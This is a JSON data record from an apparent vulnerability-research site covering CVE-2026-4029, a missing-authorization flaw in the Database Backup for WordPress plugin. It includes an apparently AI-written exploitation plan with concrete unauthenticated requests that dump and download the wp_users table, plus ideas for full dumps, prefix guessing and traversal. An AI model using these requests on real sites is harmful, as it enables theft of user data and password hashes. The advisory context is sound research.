[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXthwUQwnSqhb6TOO9a_G9tp6TLgxCeGuc3Uuu2EZTO8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":32},"CVE-2026-4029","database-backup-for-wordpress-missing-authorization-to-unauthenticated-database-export","Database Backup for WordPress \u003C= 2.5.2 - Missing Authorization to Unauthenticated Database Export","The Database Backup for WordPress plugin for WordPress is vulnerable to unauthorized database export in all versions up to, and including, 2.5.2. This is due to the plugin not properly enforcing the return value of its authorization check. This makes it possible for unauthenticated attackers to export database tables, leading to Sensitive Information Exposure. Note: This vulnerability is only exploitable in WordPress Multisite environments where the deprecated is_site_admin() function exists.","wp-db-backup",null,"\u003C=2.5.2","2.5.3","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Missing Authorization","2026-05-13 00:00:00","2026-05-14 12:32:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd4a21d0d-f455-4901-a04b-13c891cf8f75?source=api-prod",2,[22,23,24],"README.md","readme.txt","wp-db-backup.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-4029\n\n## 1. Vulnerability Summary\nThe **Database Backup for WordPress** plugin (\u003C= 2.5.2) contains a missing authorization vulnerability that allows unauthenticated attackers to trigger and download a full database export. The flaw exists because the plugin's authorization method, `can_user_backup()`, fails to terminate execution (e.g., via `wp_die()`) when an authorization check fails, particularly in WordPress Multisite environments where the legacy `is_site_admin()` function is present. \n\nBecause the caller of this function (the `init()` method) does not check the return value of `can_user_backup()`, the code proceeds to execute the backup and delivery logic regardless of the user's authentication or authorization status.\n\n## 2. Attack Vector Analysis\n*   **Endpoints:** Any WordPress page (frontend or backend), as the vulnerable logic is hooked to `init`.\n*   **Vulnerable Parameters:** `fragment` (for triggering the export) and `backup` (for downloading the file).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** \n    1.  The environment must be a **WordPress Multisite** installation.\n    2.  The deprecated function `is_site_admin()` must exist in the environment (common in legacy Multisite setups or installations with compatibility layers).\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated request is made with the `fragment` GET parameter.\n2.  **Hook Registration:** Inside `wp-db-backup.php`, the `__construct()` method of the `wpdbBackup` class runs:\n    ```php\n    } elseif ( isset( $_GET['fragment'] ) ) {\n        $this->can_user_backup( 'frame' ); \u002F\u002F Logic fails to die() here\n        add_action( 'init', array( &$this, 'init' ) );\n    ```\n3.  **Authorization Failure:** `can_user_backup()` is called. In a Multisite environment with `is_site_admin()` defined, the plugin checks authorization but likely returns `false` instead of calling `wp_die()`.\n4.  **Bypass:** The execution returns to `__construct()`, which successfully registers the `init` action.\n5.  **Execution Sink:** When the `init` hook fires, `wpdbBackup::init()` is called:\n    ```php\n    function init() {\n        $this->can_user_backup(); \u002F\u002F Again, return value ignored\n        if ( isset( $_GET['fragment'] ) ) {\n            list($table, $segment, $filename) = explode( ':', sanitize_text_field( $_GET['fragment'] ) );\n            \u002F\u002F ... validation logic ...\n            $this->backup_fragment( $table, $segment, $filename ); \u002F\u002F Table is dumped to file\n        }\n    }\n    ```\n6.  **Retrieval:** The attacker then makes a second request with `?backup=[filename]` to download the generated file via `deliver_backup()`.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **bypasses nonce checks entirely**.\n*   The `do_backup` POST path in `__construct` is protected by `check_admin_referer( $this->referer_check_key )`.\n*   However, the `fragment` and `backup` GET paths used for the fragment-based backup process **do not verify nonces** in the vulnerable versions.\n*   **Conclusion:** No nonce is required for this exploit.\n\n## 5. Exploitation Strategy\n\n### Step 1: Trigger Table Export\nIdentify the target table (usually the users table, including the prefix, e.g., `wp_users`). We will use a custom filename to avoid collision with the Swatch-time-based default filenames.\n\n**Request:**\n*   **Method:** `GET`\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Findex.php?fragment=wp_users:0:pwned_db.sql`\n\nThe plugin will execute `backup_fragment('wp_users', 0, 'pwned_db.sql')`, writing the first segment of the users table to the backup directory.\n\n### Step 2: Download the Export\nOnce the file is generated, request it using the `backup` parameter.\n\n**Request:**\n*   **Method:** `GET`\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Findex.php?backup=pwned_db.sql&via=http`\n\nThe plugin will call `deliver_backup('pwned_db.sql', 'http')`, which sends the SQL file content in the HTTP response.\n\n## 6. Test Data Setup\n1.  **Multisite Setup:** Convert the test WordPress instance to a Multisite network (add `define('WP_ALLOW_MULTISITE', true);` to `wp-config.php` and follow the Network Setup).\n2.  **Mock Deprecated Function:** Since `is_site_admin()` was removed in WP 3.0, ensure it is available to satisfy the exploit condition:\n    *   `wp eval 'function is_site_admin() { return false; }' --skip-plugins` (Or add this function to a custom mu-plugin).\n3.  **Plugin Configuration:** Install and activate `wp-db-backup` version 2.5.2.\n4.  **Target Data:** Create several dummy users to verify they appear in the export.\n\n## 7. Expected Results\n*   **First Request:** Should return a 200 OK (often with minimal output or a script tag).\n*   **Second Request:** The response headers should include `Content-Type: application\u002Foctet-stream` (or similar) and `Content-Disposition: attachment; filename=\"pwned_db.sql\"`.\n*   **Content:** The body of the response should contain valid SQL dump syntax (e.g., `INSERT INTO \"wp_users\" ...`).\n\n## 8. Verification Steps\n1.  **Check for generated file:** After Step 1, use WP-CLI to verify the file exists in the temporary backup directory:\n    `wp eval 'echo get_temp_dir();'` \n    Search that directory for `pwned_db.sql`.\n2.  **Inspect Response:** Verify the downloaded SQL contains sensitive data such as user login names and hashed passwords.\n\n## 9. Alternative Approaches\n*   **Automated Full Export:** If `fragment` requires iterating segments, a script can be written to loop through `segment` values (0, 1, 2...) until the table is fully dumped.\n*   **Core Tables Guessing:** If the table prefix is unknown, attempt to guess common ones (`wp_`, `wp_1_`, `wp_2_`) or try to dump `wp_options` first to find the prefix.\n*   **Temporary Directory Traversal:** If `validate_file` is weak (not visible in snippet), try to use the `backup` parameter to read other system files, though the plugin primarily restricts this to `$this->backup_dir`.","gemini-3-flash-preview","2026-05-14 17:39:57","2026-05-14 17:41:04",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","2.5.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-db-backup\u002Ftags\u002F2.5.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.5.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-db-backup\u002Ftags\u002F2.5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.5.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-db-backup\u002Ftags"]